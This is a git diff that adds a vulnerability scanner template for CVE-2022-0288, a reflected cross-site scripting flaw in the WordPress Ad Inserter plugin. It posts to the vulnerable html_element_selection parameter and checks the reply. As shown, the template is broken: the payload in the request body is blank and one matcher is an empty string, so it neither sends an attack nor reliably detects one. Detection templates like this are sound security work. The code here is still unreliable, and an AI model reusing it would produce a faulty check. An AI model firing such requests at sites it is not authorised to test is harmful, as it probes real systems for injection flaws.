diff --git a/cves/2022/CVE-2022-0288.yaml b/cves/2022/CVE-2022-0288.yaml
new file mode 100644
index 0000000000..d2c07e83a1
--- /dev/null
+++ b/cves/2022/CVE-2022-0288.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-0288
+
+info:
+ name: Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting
+ author: DhiyaneshDK
+ severity: medium
+ description: The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
+ remediation: Fixed in version 2.7.12
+ reference:
+ - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
+ tags: cve,cve2022,wordpress,xss
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}"
+
+ headers:
+ Content-Type: "application/x-www-form-urlencoded"
+
+ body: |
+ html_element_selection=
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - ""
+ - "ad-inserter"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
\ No newline at end of file